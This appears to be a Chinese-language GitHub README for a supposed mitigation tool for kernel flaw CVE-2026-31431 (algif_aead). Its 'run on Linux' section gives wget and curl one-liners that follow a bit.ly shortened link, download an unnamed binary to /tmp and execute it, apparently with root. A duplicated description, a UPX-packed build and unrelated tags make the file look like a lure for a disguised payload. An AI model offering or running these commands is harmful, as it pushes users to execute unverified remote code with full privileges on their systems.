attaattaatta/CVE-2026-31431

# CVE-2026-31431 缓解措施 (algif_aead) ## 描述 该工具用于检查是否存在 **CVE-2026-31431** 漏洞，并在具备 root 权限时应用缓解措施： - 禁用 `algif_aead` - 通过 `modprobe` 阻止模块加载 - 添加 `initcall_blacklist=algif_aead_init` - 通过 systemd 限制 `AF_ALG` ## 说明 该工具用于检查是否存在 **CVE-2026-31431** 漏洞并应用缓解措施（需要 root 权限）： - 禁用 `algif_aead` - 通过 `modprobe` 阻止模块加载 - 添加 `initcall_blacklist=algif_aead_init` - 通过 systemd 限制 `AF_ALG` ## 在 Linux 上运行 ``` b="/tmp/cve_2026_31431_hotfix"; wget -qO $b $(wget -qO- https://bit.ly/4elJXcG | grep browser_download_url | grep -v .exe | cut -d '"' -f 4) && chmod +x $b && $b ``` 或者 ``` b="/tmp/cve_2026_31431_hotfix"; curl -fsSL "$(curl -fsSL https://bit.ly/4elJXcG | grep browser_download_url | grep -v .exe | cut -d '"' -f 4)" -o $b && chmod +x $b && $b ``` ## 在 Linux 上构建 ``` docker run --rm -v "$PWD":/app -w /app golang:alpine sh -c "apk add --no-cache upx && go build -ldflags='-s -w' -o cve_2026_31431_hotfix cve_2026_31431_hotfix.go && upx --best --ultra-brute cve_2026_31431_hotfix" ```

标签：AF_ALG, algif_aead, CVE-2026-31431, DevSecOps, EVTX分析, Golang, Hotfix, modprobe, Root权限, systemd, Web报告查看器, 上游代理, 内核漏洞, 安全渗透, 安全缓解, 安全编程, 日志审计, 漏洞修复, 漏洞缓解措施, 系统加固, 网络安全, 网络安全培训, 补丁, 请求拦截, 隐私保护